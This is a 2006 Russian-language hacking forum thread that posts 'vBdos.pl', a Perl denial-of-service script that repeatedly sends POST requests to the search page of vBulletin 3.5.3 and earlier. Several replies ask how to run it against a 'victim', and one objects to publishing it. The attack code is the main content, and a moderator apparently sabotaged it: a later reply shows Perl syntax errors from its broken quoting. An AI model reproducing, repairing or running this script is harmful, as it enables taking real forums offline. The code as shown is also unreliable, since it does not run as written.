 |
Уязвимость в vBulletin <=3.5.3 DoS |
26.01.2006, 16:48
|
|
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
С нами:
10845026
Репутация:
212
|
|
Уязвимость в vBulletin <=3.5.3 DoS
DoS атака на vBulletin версии 3.5.3 и ниже
Автор: spic of g00ns <spic <at> g00ns.net>
Код:
#!/usr/bin/per1
##########################################
# vBdos.pl - vBulletin <=3.5.3 Search DoS
#
# Written by spic of g00ns
##########################################
# Contact
# Site: www.g00ns.net and www.g00ns-forum.net
# Email: spic <at> g00ns.net
# IRC: irc.g00ns.net #g00ns
##########################################
# Example
# vBdos.pl www.avbforum.com /vbulletin/
##########################################
# Partially ripped from zod32 of g00ns!
# Sorry, zod! :(
# Excuse the messy code :]
##########################################
# Shoutz to
#
# z3r0, ArYa, uid0, zod32, kutmaster,
# felosi, cijfer, wr0ck,
# and the rest of the crew! ;)
##########################################
use IO::Socket;
$server= $ARGV[0];
$path=$ARGV[1];
while($x != 9999)
{
$post =''search_keywords=spic+of+g00ns+owned+your+site$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
$lrg = length $post;
if(!$server||!$path)
{
print "rn";
print "vBulletin DoS by spic of g00nsn";
print "usage: vBdos.pl <host without http> <directory>rn";
exit();
}
my $sock = new IO::Socket::INET (
PeerAddr => "$server",
PeerPort => "80",
Proto => "tcp",
);
die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;
print $sock "POST $path"."search.php?searchid=1952 HTTP/1.1n";
print $sock "Host: $servern";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $servern";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.5n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postn";
close($sock);
syswrite STDOUT,".";
$x++;
}
##########################################
Последний раз редактировалось Azazel; 26.01.2006 в 23:39..
|
|
|
26.01.2006, 19:36
|
|
Новичок
Регистрация: 24.11.2005
Сообщений: 18
С нами:
10768127
Репутация:
0
|
|
Если можешь, напиши плиз как ее применять...
|
|
|
|
26.01.2006, 23:26
|
|
Banned
Регистрация: 06.10.2005
Сообщений: 180
С нами:
10838960
Репутация:
-4
|
|
Нах выкладывать дос сплойты теперь всякое ламерье будут форумы досить причем просто так...
|
|
|
|
26.01.2006, 23:34
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами:
11087066
Репутация:
561
|
|
Имхо. И что может быть тупее чем ddos? И нафига? Лучше уж правда, чему - нибудь путному учиться.
PS. Сплойт больше нерабочий.
|
|
|
|
26.01.2006, 23:53
|
|
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
С нами:
10924226
Репутация:
1419
|
|
Имхо. И что может быть тупее чем ddos? И нафига? Лучше уж правда, чему - нибудь путному учиться.
PS. Сплойт больше нерабочий.
Тем более, дос атака не катит. В МОА её ваще нельзя использовать...
|
|
|
|
27.01.2006, 01:37
|
|
Новичок
Регистрация: 26.01.2006
Сообщений: 24
С нами:
10678656
Репутация:
0
|
|
Как юзать этот эксплойт? Можно ли ис cmd WinXP и где указывать адрес жертвы?
|
|
|
|
27.01.2006, 13:29
|
|
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
С нами:
10845026
Репутация:
212
|
|
Azazel спасибо что сплоит нерабочим сделал, сорри что я сразу неподумал. Тему лучше закрыть, или удалить. Спасибо за внимание...
|
|
|
|
28.01.2006, 14:00
|
|
Новичок
Регистрация: 17.07.2005
Сообщений: 2
С нами:
10955585
Репутация:
0
|
|
error
Код:
C:\Perl\bin>perl vBdos.pl
Bareword found where operator expected at vBdos.pl line 33, near "''search_keywords"
(Missing operator before search_keywords?)
Operator or semicolon missing before &search_author at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &search_time at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &search_fields at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &search_cat at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &sort_by at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &sort_dir at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &show_results at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
Operator or semicolon missing before &return_chars at vBdos.pl line 33.
Ambiguous use of & resolved as operator & at vBdos.pl line 33.
String found where operator expected at vBdos.pl line 40, near "print ""
(Might be a runaway multi-line "" string starting on line 33)
(Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 40, near "print "rn"
(Do you need to predeclare print?)
String found where operator expected at vBdos.pl line 41, near "print ""
(Might be a runaway multi-line "" string starting on line 40)
(Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 41, near "print "vBulletin"
(Do you need to predeclare print?)
Bareword found where operator expected at vBdos.pl line 42, near "print "usage"
(Might be a runaway multi-line "" string starting on line 41)
(Do you need to predeclare print?)
Bareword found where operator expected at vBdos.pl line 42, near "<directory>rn"
(Missing operator before rn?)
String found where operator expected at vBdos.pl line 49, near "PeerAddr => ""
(Might be a runaway multi-line "" string starting on line 42)
(Missing semicolon on previous line?)
Scalar found where operator expected at vBdos.pl line 49, near "PeerAddr => "$server"
(Do you need to predeclare PeerAddr?)
String found where operator expected at vBdos.pl line 50, near "PeerPort => ""
(Might be a runaway multi-line "" string starting on line 49)
(Missing semicolon on previous line?)
Number found where operator expected at vBdos.pl line 50, near "PeerPort => "80"
(Do you need to predeclare PeerPort?)
String found where operator expected at vBdos.pl line 51, near "Proto => ""
(Might be a runaway multi-line "" string starting on line 50)
(Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 51, near "Proto => "tcp"
(Do you need to predeclare Proto?)
String found where operator expected at vBdos.pl line 53, near "die ""
(Might be a runaway multi-line "" string starting on line 51)
(Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 53, near "die "nThe"
(Do you need to predeclare die?)
Bareword found where operator expected at vBdos.pl line 53, near "$!n"
(Missing operator before n?)
String found where operator expected at vBdos.pl line 56, near "print $sock ""
(Might be a runaway multi-line "" string starting on line 53)
(Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 56, near "print $sock "POST"
(Do you need to predeclare print?)
String found where operator expected at vBdos.pl line 56, near "$path".""
(Missing operator before "."?)
Bareword found where operator expected at vBdos.pl line 56, near ""."search"
(Missing operator before search?)
Bareword found where operator expected at vBdos.pl line 56, near "1952 HTTP"
(Missing operator before HTTP?)
Bareword found where operator expected at vBdos.pl line 56, near "1.1n"
(Missing operator before n?)
String found where operator expected at vBdos.pl line 57, near "print $sock ""
(Might be a runaway multi-line "" string starting on line 56)
(Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 57, near "print $sock "Host"
(Do you need to predeclare print?)
String found where operator expected at vBdos.pl line 58, near "print $sock ""
(Might be a runaway multi-line "" string starting on line 57)
(Missing semicolon on previous line?)
Bareword found where operator expected at vBdos.pl line 58, near "print $sock "Accept"
(Do you need to predeclare print?)
Number found where operator expected at vBdos.pl line 58, near "q=0.9,text/plain;q=0.8"
syntax error at vBdos.pl line 33, near "''search_keywords"
Can't find string terminator "=" anywhere before EOF at vBdos.pl line 58.
Последний раз редактировалось kabadayi; 28.01.2006 в 14:09..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
